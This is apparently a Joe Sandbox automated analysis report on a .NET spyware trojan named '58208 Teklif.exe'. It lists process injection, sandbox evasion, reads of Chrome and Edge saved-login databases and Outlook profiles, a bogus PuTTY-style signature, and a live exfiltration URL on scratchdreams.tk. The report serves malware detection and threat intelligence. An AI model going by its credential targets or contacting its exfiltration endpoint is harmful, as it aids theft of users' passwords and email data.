            Source: C:\Users\user\Desktop\58208 Teklif.exe; Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\58208 Teklif.exe; Code function: 3_2_05A989B0 LdrInitializeThunk,3_2_05A989B0
            Source: C:\Users\user\Desktop\58208 Teklif.exe; Process token adjusted: Debug
            Source: C:\Users\user\Desktop\58208 Teklif.exe; Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\58208 Teklif.exe; Memory written: C:\Users\user\Desktop\58208 Teklif.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\58208 Teklif.exe; Process created: C:\Users\user\Desktop\58208 Teklif.exe "C:\Users\user\Desktop\58208 Teklif.exe"
            Source: C:\Users\user\Desktop\58208 Teklif.exe; Queries volume information: C:\Users\user\Desktop\58208 Teklif.exe VolumeInformation
            Source: C:\Users\user\Desktop\58208 Teklif.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\58208 Teklif.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\58208 Teklif.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\58208 Teklif.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\58208 Teklif.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\58208 Teklif.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\Desktop\58208 Teklif.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\user\Desktop\58208 Teklif.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match; File source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.3769706051.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: 58208 Teklif.exe PID: 7436, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: 58208 Teklif.exe PID: 7580, type: MEMORYSTR
            Source: C:\Users\user\Desktop\58208 Teklif.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\58208 Teklif.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\58208 Teklif.exe; File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: C:\Users\user\Desktop\58208 Teklif.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Remote Access Functionality

            Source: Yara match; File source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.3769706051.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: 58208 Teklif.exe PID: 7436, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: 58208 Teklif.exe PID: 7580, type: MEMORYSTR

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 111 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

            Source | Detection | Scanner | Label
            58208 Teklif.exe | 53% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
            58208 Teklif.exe | 66% | Virustotal |
            58208 Teklif.exe | 100% | Joe Sandbox ML |

            No Antivirus matches

            Source | Detection | Scanner | Label
            reallyfreegeoip.org | 1% | Virustotal |
            scratchdreams.tk | 6% | Virustotal |
            checkip.dyndns.com | 0% | Virustotal |
            checkip.dyndns.org | 0% | Virustotal |

            Source | Detection | Scanner | Label
            http://checkip.dyndns.org/ | 0% | URL Reputation | safe
            http://checkip.dyndns.org/q | 0% | URL Reputation | safe
            http://reallyfreegeoip.org | 0% | URL Reputation | safe
            https://reallyfreegeoip.org | 0% | URL Reputation | safe
            http://checkip.dyndns.org | 0% | URL Reputation | safe
            http://checkip.dyndns.com | 0% | URL Reputation | safe
            https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | URL Reputation | safe
            https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe
            http://tempuri.org/DataSet1.xsdCEscolha | 0% | Avira URL Cloud | safe
            https://scratchdreams.tk | 100% | Avira URL Cloud | malware
            http://scratchdreams.tk | 100% | Avira URL Cloud | malware
            https://scratchdreams.tk/_send_.php?TS | 100% | Avira URL Cloud | malware
            https://reallyfreegeoip.org/xml/102.129.152.231$ | 0% | Avira URL Cloud | safe
            https://reallyfreegeoip.org/xml/102.129.152.231 | 0% | Avira URL Cloud | safe
            https://scratchdreams.tk | 15% | Virustotal |
            http://tempuri.org/DataSet1.xsdCEscolha | 3% | Virustotal |

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            reallyfreegeoip.org | 104.21.67.152 | true | false |  | unknown
            scratchdreams.tk | 172.67.169.18 | true | true |  | unknown
            checkip.dyndns.com | 193.122.130.0 | true | false |  | unknown
            checkip.dyndns.org | unknown | unknown | true |  | unknown

            Name | Malicious | Antivirus Detection | Reputation
            http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
            https://scratchdreams.tk/_send_.php?TS | false | Avira URL Cloud: malware | unknown
            https://reallyfreegeoip.org/xml/102.129.152.231 | false | Avira URL Cloud: safe | unknown

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://tempuri.org/DataSet1.xsdCEscolha | 58208 Teklif.exe | false | 3%, Virustotal; Avira URL Cloud: safe | unknown
            http://checkip.dyndns.org/q | 58208 Teklif.exe, 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://scratchdreams.tk | 58208 Teklif.exe, 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp | true | 15%, Virustotal; Avira URL Cloud: malware | unknown
            http://reallyfreegeoip.org | 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003059000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000304B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003093000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://reallyfreegeoip.org | 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003059000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000304B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003093000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://checkip.dyndns.org | 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003059000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002F98000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000304B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003074000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003093000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://checkip.dyndns.com | 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003059000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000304B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003093000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp | false |  | high
            https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 58208 Teklif.exe | false | URL Reputation: safe | unknown
            https://reallyfreegeoip.org/xml/102.129.152.231$ | 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030A2000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003059000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FED000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.000000000304B000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003093000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000003066000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://scratchdreams.tk | 58208 Teklif.exe, 00000003.00000002.3769706051.00000000030B0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
            https://reallyfreegeoip.org/xml/ | 58208 Teklif.exe, 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3769706051.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, 58208 Teklif.exe, 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

            IP | Domain | Country | ASN | ASN Name | Malicious
            104.21.67.152 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
            172.67.169.18 | scratchdreams.tk | United States | 13335 | CLOUDFLARENETUS | true
            193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false

            Joe Sandbox version: 40.0.0 Tourmaline
            Analysis ID: 1422217
            Start date and time: 2024-04-08 13:00:51 +02:00
            Joe Sandbox product: CloudBasic
            Overall analysis duration: 0h 8m 54s
            Hypervisor based Inspection enabled: false
            Report type: full
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed: 13
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Sample name: 58208 Teklif.exe
            Detection: MAL
            Classification: mal100.troj.spyw.evad.winEXE@3/1@3/3
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 140
            • Number of non-executed functions: 57
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240000 for current running targets taking high CPU consumption
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes were analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.

Time | Type | Description
13:01:46 | API Interceptor | 9453012x Sleep call for process: 58208 Teklif.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                    No context
                                                    Process:C:\Users\user\Desktop\58208 Teklif.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.34331486778365
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.284534608814056
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:58208 Teklif.exe
                                                    File size:846'344 bytes
                                                    MD5:dc59e080bc0be8cee52ec9e79ccc7e82
                                                    SHA1:22d8e9aab959c584acc896bfeed170ffa672f1cb
                                                    SHA256:95e4dd6cc5a341f4440a113e0a832175aa2f5baafd9c7483255a18088e1c2764
                                                    SHA512:7b836760ab575de13b95878a075ff8998e57433d0a7f5b2efb2bc4e3d7c4459e06af9cd71ca19f36913afde5c2b265667658542d892a61ea7f5b17f19d2484e0
                                                    SSDEEP:12288:6rLz6X60UHRoVNDWX4gpBRkZf0E5Vav8V7DcRIqlrTwimh0ndFJkTtlXkR:r67HRi4XLy90E5IUFgIqlrtnzQPC
                                                    TLSH:20054CD1F1508D9AEC6B0AF1BD2AA43025E3BE9D54A4810C559EB71B76F3342209FE1F
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0..$...........B... ...`....@.. ....................... ............@................................
                                                    Icon Hash:aea4accc16a3d9be
                                                    Entrypoint:0x484216
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x660FAE9B [Fri Apr 5 07:56:11 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                    Signature Valid:false
                                                    Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                    Signature Validation Error:The digital signature of the object did not verify
                                                    Error Number:-2146869232
Not Before: 13/11/2018 01:00:00
Not After: 09/11/2021 00:59:59
                                                    Subject Chain
                                                    • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                    Version:3
                                                    Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                    Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                    Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                    Serial:7C1118CBBADC95DA3752C46E47A27438
                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    xor al, 38h
                                                    xor eax, 38483446h
                                                    xor al, 47h
                                                    dec eax
                                                    xor eax, 00003447h
                                                    add byte ptr [edx], dh
                                                    inc ebx
                                                    inc edx
                                                    push ebx
                                                    aaa
                                                    dec eax
                                                    xor eax, 00003439h
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x841c3 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x86000 | 0x48a60 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xcb400 | 0x3608 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x81f64 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x8223c | 0x82400 | 296ff05f0b9740645c3fd44944c9468a | False | 0.9414793516074856 | data | 7.939659429835133 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x86000 | 0x48a60 | 0x48c00 | 55d17303af90a0aaec9680bdbec1ea2d | False | 0.06316110932130584 | data | 4.772277429522695 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xd0000 | 0xc | 0x200 | 56866c8b8f76466dc7825728370875b5 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x862e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | | | 0.1798780487804878
RT_ICON | 0x86948 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | | | 0.2513440860215054
RT_ICON | 0x86c30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | | | 0.3918918918918919
RT_ICON | 0x86d58 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.3200959488272921
RT_ICON | 0x87c00 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.33664259927797835
RT_ICON | 0x884a8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.2622832369942196
RT_ICON | 0x88a10 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 0 | | | 0.04393141403083114
RT_ICON | 0xcaa38 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.18786307053941909
RT_ICON | 0xccfe0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.2453095684803002
RT_ICON | 0xce088 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.3484042553191489
RT_GROUP_ICON | 0xce4f0 | 0x92 | data | | | 0.5753424657534246
RT_VERSION | 0xce584 | 0x2f0 | SysEx File - IDP | | | 0.44148936170212766
RT_MANIFEST | 0xce874 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 8, 2024 13:01:48.556941986 CEST | 61151 | 53 | 192.168.2.11 | 1.1.1.1
Apr 8, 2024 13:01:48.682076931 CEST | 53 | 61151 | 1.1.1.1 | 192.168.2.11
Apr 8, 2024 13:01:49.742367983 CEST | 56104 | 53 | 192.168.2.11 | 1.1.1.1
Apr 8, 2024 13:01:49.867841959 CEST | 53 | 56104 | 1.1.1.1 | 192.168.2.11
Apr 8, 2024 13:01:56.485887051 CEST | 49191 | 53 | 192.168.2.11 | 1.1.1.1
Apr 8, 2024 13:01:56.853611946 CEST | 53 | 49191 | 1.1.1.1 | 192.168.2.11
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 8, 2024 13:01:48.556941986 CEST | 192.168.2.11 | 1.1.1.1 | 0x40f4 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Apr 8, 2024 13:01:49.742367983 CEST | 192.168.2.11 | 1.1.1.1 | 0x95ee | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Apr 8, 2024 13:01:56.485887051 CEST | 192.168.2.11 | 1.1.1.1 | 0xebfa | Standard query (0) | scratchdreams.tk | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
